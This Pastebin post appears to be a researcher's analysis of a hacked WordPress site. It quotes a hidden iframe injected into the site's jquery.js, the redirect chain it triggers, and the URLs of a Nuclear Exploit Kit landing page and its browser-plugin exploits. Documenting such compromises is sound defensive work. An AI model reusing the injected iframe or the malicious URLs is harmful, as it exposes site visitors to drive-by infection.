Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // JavaScript at http://www.coffeeandquinoa.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 has the following code injected
- document.write('<iframe src="http://fikakuir.zuttoakame.com/giglouiders16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe>');
- // request for 'http://fikakuir.zuttoakame.com/giglouiders16.html' returns 302 response to 'http://digaoplar.nutrimedica.com.br/1550ce7dpwt/1/9ffbf35e4190fbba62f70c8477fa3964.html'
- HTTP/1.1 302 Found
- Server: nginx
- Date: Wed, 10 Sep 2014 16:39:18 GMT
- Content-Type: text/html; charset=iso-8859-1
- Content-Length: 360
- Location: http://digaoplar.nutrimedica.com.br/1550ce7dpwt/1/9ffbf35e4190fbba62f70c8477fa3964.html
- Connection: close
- Set-Cookie:
- // 9ffbf35e4190fbba62f70c8477fa3964.html is a landing page for Nuclear Exploit Kit that will attempt to compromise the machine through the following
- http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.jar - Java Exploit
- http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.htm - IE Exploit
- http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.xap - SilverLight Exploit
- http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.swf - Shockwave Flash Player Exploit
- http://digaoplar.nutrimedica.com.br/2740087946/2/1410359100.pdf - Adobe PDF plugin Exploit
Add Comment
Please, Sign In to add comment